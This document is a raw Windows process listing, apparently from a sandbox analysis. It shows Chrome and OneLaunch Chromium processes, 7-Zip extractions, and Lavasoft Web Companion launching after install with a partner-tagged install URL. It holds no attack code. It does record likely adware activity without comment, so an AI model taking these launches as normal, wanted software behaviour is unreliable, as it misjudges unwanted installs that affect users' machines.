C:\Users\Admin\AppData\Local\OneLaunch\5.17.4\chromium\chromium.exe
"C:\Users\Admin\AppData\Local\OneLaunch\5.17.4\chromium\chromium.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=5096 --field-trial-handle=2188,i,14150321953504742357,16382527469301661525,131072 /prefetch:8
C:\Users\Admin\AppData\Local\OneLaunch\5.17.4\onelaunchtray.exe
"C:\Users\Admin\AppData\Local\OneLaunch\5.17.4\onelaunchtray.exe"
C:\Users\Admin\AppData\Local\OneLaunch\5.17.4\chromium\chromium.exe
"C:\Users\Admin\AppData\Local\OneLaunch\5.17.4\chromium\chromium.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=5040 --field-trial-handle=2188,i,14150321953504742357,16382527469301661525,131072 /prefetch:8
C:\Users\Admin\AppData\Local\OneLaunch\5.17.4\chromium\chromium.exe
"C:\Users\Admin\AppData\Local\OneLaunch\5.17.4\chromium\chromium.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=5020 --field-trial-handle=2188,i,14150321953504742357,16382527469301661525,131072 /prefetch:8
C:\Users\Admin\AppData\Local\OneLaunch\5.17.4\chromium\chromium.exe
"C:\Users\Admin\AppData\Local\OneLaunch\5.17.4\chromium\chromium.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=5520 --field-trial-handle=2188,i,14150321953504742357,16382527469301661525,131072 /prefetch:8
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 484 -p 3248 -ip 3248
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3248 -s 2720
C:\Users\Admin\AppData\Local\OneLaunch\5.17.4\chromium\chromium.exe
"C:\Users\Admin\AppData\Local\OneLaunch\5.17.4\chromium\chromium.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=5672 --field-trial-handle=2188,i,14150321953504742357,16382527469301661525,131072 /prefetch:8
C:\Users\Admin\AppData\Local\OneLaunch\5.17.4\chromium\chromium.exe
"C:\Users\Admin\AppData\Local\OneLaunch\5.17.4\chromium\chromium.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=5516 --field-trial-handle=2188,i,14150321953504742357,16382527469301661525,131072 /prefetch:8
C:\Users\Admin\AppData\Local\OneLaunch\5.17.4\chromium\chromium.exe
"C:\Users\Admin\AppData\Local\OneLaunch\5.17.4\chromium\chromium.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=5944 --field-trial-handle=2188,i,14150321953504742357,16382527469301661525,131072 /prefetch:8
C:\Users\Admin\AppData\Local\OneLaunch\5.17.4\chromium\chromium.exe
"C:\Users\Admin\AppData\Local\OneLaunch\5.17.4\chromium\chromium.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=5552 --field-trial-handle=2188,i,14150321953504742357,16382527469301661525,131072 /prefetch:8
C:\Users\Admin\AppData\Local\OneLaunch\5.17.4\chromium\chromium.exe
"C:\Users\Admin\AppData\Local\OneLaunch\5.17.4\chromium\chromium.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=5824 --field-trial-handle=2188,i,14150321953504742357,16382527469301661525,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=83 --mojo-platform-channel-handle=7324 --field-trial-handle=1920,i,2950334911723628717,3168970873131766872,131072 /prefetch:1
C:\Users\Admin\AppData\Local\OneLaunch\5.17.4\chromium\chromium.exe
"C:\Users\Admin\AppData\Local\OneLaunch\5.17.4\chromium\chromium.exe" --type=renderer --extension-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --mojo-platform-channel-handle=6384 --field-trial-handle=2188,i,14150321953504742357,16382527469301661525,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=84 --mojo-platform-channel-handle=8140 --field-trial-handle=1920,i,2950334911723628717,3168970873131766872,131072 /prefetch:1
C:\Users\Admin\AppData\Local\OneLaunch\5.17.4\chromium\chromium.exe
"C:\Users\Admin\AppData\Local\OneLaunch\5.17.4\chromium\chromium.exe" --type=renderer --extension-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --mojo-platform-channel-handle=6568 --field-trial-handle=2188,i,14150321953504742357,16382527469301661525,131072 /prefetch:1
C:\Users\Admin\AppData\Roaming\Lavasoft\Web Companion\Application\WebCompanion.exe
"C:\Users\Admin\AppData\Roaming\Lavasoft\Web Companion\Application\WebCompanion.exe" --afterinstall
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" https://webcompanion.com/en/install.php?partner=IN220101&campaign=18022583703
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7fff9a469758,0x7fff9a469768,0x7fff9a469778
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=85 --mojo-platform-channel-handle=8052 --field-trial-handle=1920,i,2950334911723628717,3168970873131766872,131072 /prefetch:1
C:\Users\Admin\AppData\Local\OneLaunch\5.17.4\chromium\chromium.exe
"C:\Users\Admin\AppData\Local\OneLaunch\5.17.4\chromium\chromium.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5292 --field-trial-handle=2188,i,14150321953504742357,16382527469301661525,131072 /prefetch:8
C:\Users\Admin\AppData\Local\OneLaunch\5.17.4\chromium\chromium.exe
"C:\Users\Admin\AppData\Local\OneLaunch\5.17.4\chromium\chromium.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5404 --field-trial-handle=2188,i,14150321953504742357,16382527469301661525,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=2520 --field-trial-handle=1920,i,2950334911723628717,3168970873131766872,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4752 --field-trial-handle=1920,i,2950334911723628717,3168970873131766872,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4552 --field-trial-handle=1920,i,2950334911723628717,3168970873131766872,131072 /prefetch:8
C:\Users\Admin\AppData\Local\OneLaunch\5.17.4\chromium\chromium.exe
"C:\Users\Admin\AppData\Local\OneLaunch\5.17.4\chromium\chromium.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAACQAAAAAAAAAAAAAAAAAAAAAAAAABgAAAAAAAAAGAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=5368 --field-trial-handle=2188,i,14150321953504742357,16382527469301661525,131072 /prefetch:2
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=89 --mojo-platform-channel-handle=5032 --field-trial-handle=1920,i,2950334911723628717,3168970873131766872,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=90 --mojo-platform-channel-handle=3444 --field-trial-handle=1920,i,2950334911723628717,3168970873131766872,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=91 --mojo-platform-channel-handle=3388 --field-trial-handle=1920,i,2950334911723628717,3168970873131766872,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=92 --mojo-platform-channel-handle=8172 --field-trial-handle=1920,i,2950334911723628717,3168970873131766872,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=93 --mojo-platform-channel-handle=7936 --field-trial-handle=1920,i,2950334911723628717,3168970873131766872,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=94 --mojo-platform-channel-handle=7488 --field-trial-handle=1920,i,2950334911723628717,3168970873131766872,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=95 --mojo-platform-channel-handle=4896 --field-trial-handle=1920,i,2950334911723628717,3168970873131766872,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=96 --mojo-platform-channel-handle=7604 --field-trial-handle=1920,i,2950334911723628717,3168970873131766872,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=97 --mojo-platform-channel-handle=7436 --field-trial-handle=1920,i,2950334911723628717,3168970873131766872,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=98 --mojo-platform-channel-handle=7808 --field-trial-handle=1920,i,2950334911723628717,3168970873131766872,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=6956 --field-trial-handle=1920,i,2950334911723628717,3168970873131766872,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=8196 --field-trial-handle=1920,i,2950334911723628717,3168970873131766872,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=101 --mojo-platform-channel-handle=7504 --field-trial-handle=1920,i,2950334911723628717,3168970873131766872,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=102 --mojo-platform-channel-handle=6780 --field-trial-handle=1920,i,2950334911723628717,3168970873131766872,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=103 --mojo-platform-channel-handle=6352 --field-trial-handle=1920,i,2950334911723628717,3168970873131766872,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=104 --mojo-platform-channel-handle=8468 --field-trial-handle=1920,i,2950334911723628717,3168970873131766872,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=105 --mojo-platform-channel-handle=2780 --field-trial-handle=1920,i,2950334911723628717,3168970873131766872,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=106 --mojo-platform-channel-handle=8432 --field-trial-handle=1920,i,2950334911723628717,3168970873131766872,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=107 --mojo-platform-channel-handle=7916 --field-trial-handle=1920,i,2950334911723628717,3168970873131766872,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=108 --mojo-platform-channel-handle=6964 --field-trial-handle=1920,i,2950334911723628717,3168970873131766872,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=109 --mojo-platform-channel-handle=8588 --field-trial-handle=1920,i,2950334911723628717,3168970873131766872,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=110 --mojo-platform-channel-handle=8772 --field-trial-handle=1920,i,2950334911723628717,3168970873131766872,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=8724 --field-trial-handle=1920,i,2950334911723628717,3168970873131766872,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=112 --mojo-platform-channel-handle=8924 --field-trial-handle=1920,i,2950334911723628717,3168970873131766872,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=113 --mojo-platform-channel-handle=9032 --field-trial-handle=1920,i,2950334911723628717,3168970873131766872,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=114 --mojo-platform-channel-handle=9256 --field-trial-handle=1920,i,2950334911723628717,3168970873131766872,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=115 --mojo-platform-channel-handle=9380 --field-trial-handle=1920,i,2950334911723628717,3168970873131766872,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=116 --mojo-platform-channel-handle=9488 --field-trial-handle=1920,i,2950334911723628717,3168970873131766872,131072 /prefetch:1
C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=117 --mojo-platform-channel-handle=8284 --field-trial-handle=1920,i,2950334911723628717,3168970873131766872,131072 /prefetch:1
C:\Program Files\7-Zip\7zG.exe
"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Downloads\" -an -ai#7zMap10166:82:7zEvent26026
C:\Users\Admin\AppData\Local\OneLaunch\5.17.4\chromium\chromium.exe
"C:\Users\Admin\AppData\Local\OneLaunch\5.17.4\chromium\chromium.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=6600 --field-trial-handle=2188,i,14150321953504742357,16382527469301661525,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=118 --mojo-platform-channel-handle=9332 --field-trial-handle=1920,i,2950334911723628717,3168970873131766872,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=119 --mojo-platform-channel-handle=9232 --field-trial-handle=1920,i,2950334911723628717,3168970873131766872,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=120 --mojo-platform-channel-handle=9276 --field-trial-handle=1920,i,2950334911723628717,3168970873131766872,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=121 --mojo-platform-channel-handle=9344 --field-trial-handle=1920,i,2950334911723628717,3168970873131766872,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=122 --mojo-platform-channel-handle=9544 --field-trial-handle=1920,i,2950334911723628717,3168970873131766872,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=123 --mojo-platform-channel-handle=8868 --field-trial-handle=1920,i,2950334911723628717,3168970873131766872,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=124 --mojo-platform-channel-handle=9572 --field-trial-handle=1920,i,2950334911723628717,3168970873131766872,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=125 --mojo-platform-channel-handle=9164 --field-trial-handle=1920,i,2950334911723628717,3168970873131766872,131072 /prefetch:1
C:\Program Files\7-Zip\7zG.exe
"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Downloads\" -an -ai#7zMap22292:82:7zEvent21458
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=126 --mojo-platform-channel-handle=10036 --field-trial-handle=1920,i,2950334911723628717,3168970873131766872,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=127 --mojo-platform-channel-handle=2768 --field-trial-handle=1920,i,2950334911723628717,3168970873131766872,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=128 --mojo-platform-channel-handle=7616 --field-trial-handle=1920,i,2950334911723628717,3168970873131766872,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=129 --mojo-platform-channel-handle=6856 --field-trial-handle=1920,i,2950334911723628717,3168970873131766872,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=130 --mojo-platform-channel-handle=9948 --field-trial-handle=1920,i,2950334911723628717,3168970873131766872,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=131 --mojo-platform-channel-handle=9788 --field-trial-handle=1920,i,2950334911723628717,3168970873131766872,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=132 --mojo-platform-channel-handle=9464 --field-trial-handle=1920,i,2950334911723628717,3168970873131766872,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=133 --mojo-platform-channel-handle=9356 --field-trial-handle=1920,i,2950334911723628717,3168970873131766872,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=134 --mojo-platform-channel-handle=10176 --field-trial-handle=1920,i,2950334911723628717,3168970873131766872,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=135 --mojo-platform-channel-handle=10252 --field-trial-handle=1920,i,2950334911723628717,3168970873131766872,131072 /prefetch:1
C:\Users\Admin\AppData\Local\OneLaunch\5.17.4\chromium\chromium.exe
"C:\Users\Admin\AppData\Local\OneLaunch\5.17.4\chromium\chromium.exe" --type=renderer --extension-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=23 --mojo-platform-channel-handle=4716 --field-trial-handle=2188,i,14150321953504742357,16382527469301661525,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=136 --mojo-platform-channel-handle=8360 --field-trial-handle=1920,i,2950334911723628717,3168970873131766872,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=137 --mojo-platform-channel-handle=9856 --field-trial-handle=1920,i,2950334911723628717,3168970873131766872,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=138 --mojo-platform-channel-handle=8852 --field-trial-handle=1920,i,2950334911723628717,3168970873131766872,131072 /prefetch:1
